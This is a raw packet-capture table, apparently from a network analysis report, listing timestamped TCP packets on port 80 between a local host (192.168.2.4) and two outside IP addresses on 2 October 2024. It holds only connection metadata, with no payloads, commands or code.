Oct 2, 2024 09:41:28.237005949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237068892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237101078 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237142086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237142086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237142086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237142086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237142086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237142086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237149954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237181902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237214088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237262011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237293959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237313986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237313986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237313986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237323046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237334013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237334013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237373114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237375021 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.237405062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237437963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237468958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237499952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237531900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.237565994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.238410950 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.238410950 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.238410950 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.238410950 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.238410950 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.286799908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.291809082 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.462948084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463038921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463074923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463124037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463156939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463188887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463238955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463279009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463279009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463279009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463279009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463279009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463289022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463321924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463352919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463406086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463424921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463475943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463510990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463537931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463568926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463601112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463646889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463680029 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463685989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463685989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463685989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463686943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463686943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463686943 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463711023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463747025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463778019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463810921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463850021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463859081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463859081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463859081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463859081 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463877916 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.463881969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463915110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463946104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.463994026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464041948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464072943 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464103937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464128017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464128017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464128017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464128017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464128017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464135885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464168072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464198112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464231014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464261055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464292049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464301109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464301109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464301109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464301109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464301109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464301109 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464323997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464358091 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464386940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464417934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464449883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464481115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464514971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464564085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464576960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464576960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464576960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464576960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464576960 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464595079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464600086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464600086 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464643002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464674950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464704037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464742899 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464742899 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464742899 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464742899 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464751959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464781046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464828968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464859962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464907885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464940071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464971066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.464978933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464978933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464978933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464978933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464978933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.464978933 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465002060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465029955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465059996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465101957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465132952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465164900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465172052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465173006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465173006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465173006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465173006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465173006 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465194941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465228081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465245008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465245008 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465259075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465291023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465317965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465348005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465356112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465356112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465356112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465356112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465379953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465409040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465440989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465471983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465503931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465531111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465562105 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465594053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465625048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465656996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465688944 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465697050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465697050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465697050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465697050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465697050 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465698004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465720892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.465749025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.465848923 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.849953890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.849953890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.855020046 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.855057955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:29.174886942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:29.174964905 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:29.307133913 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:29.312047005 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:29.485987902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:29.486008883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:29.486022949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:29.486053944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:29.486143112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:29.488054037 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:29.492872953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:29.669231892 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:29.669482946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:29.844616890 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:29.850627899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:30.044239044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:30.045365095 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:30.323353052 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:30.328304052 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:30.519325972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:30.519418955 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:30.633625984 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:30.638597012 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:30.640315056 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:30.640676975 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:30.645581961 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.744663000 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.744746923 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.744756937 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.744786978 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.744813919 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.744837999 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.744870901 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.744887114 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.744903088 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.744925022 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.744935036 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.744946957 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.744986057 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.745007992 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.745018005 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.745032072 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.745050907 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.745084047 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.745105028 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.745134115 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.745151997 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.745507956 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.752147913 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.752182007 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.752207041 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.752213955 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.752240896 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.752248049 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.752260923 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.752295017 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.754195929 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.754496098 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.754544020 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.754590034 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.754679918 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.754724979 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.755013943 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.755065918 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.755438089 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.755495071 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.755573988 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.755605936 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.755630970 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.755639076 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.755686998 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.756475925 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.756509066 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.756547928 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.756577969 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.756983995 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.757016897 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.757083893 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.757118940 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.757220984 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760035992 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760202885 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760251045 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760278940 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760333061 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760442019 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760520935 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760571003 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760603905 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760612965 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760632992 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760636091 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760652065 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760667086 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760683060 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760715008 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.760750055 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760778904 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.760936975 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.761012077 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.761091948 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.761312008 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.761742115 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.761799097 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.761915922 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.761976957 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.762470007 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.762502909 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.762557983 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.762607098 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.762794971 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.765104055 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.765136957 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.765204906 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.765271902 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.765305042 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.765356064 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.765597105 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.765647888 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.765698910 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.765913010 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.765974045 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.766021013 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.766067982 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.766241074 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.766310930 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.766345978 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.766374111 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.766609907 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.766642094 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.766666889 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.766694069 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.766926050 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.766979933 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.767014027 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.767031908 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.767046928 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.767064095 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.767080069 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.767088890 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.767113924 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.767127991 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.767239094 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.767906904 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.767940044 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.767966986 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.767973900 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.767987013 CEST	49758	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:31.768007994 CEST	80	49758	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:31.768292904 CEST	49758	80	192.168.2.4	147.45.44.104
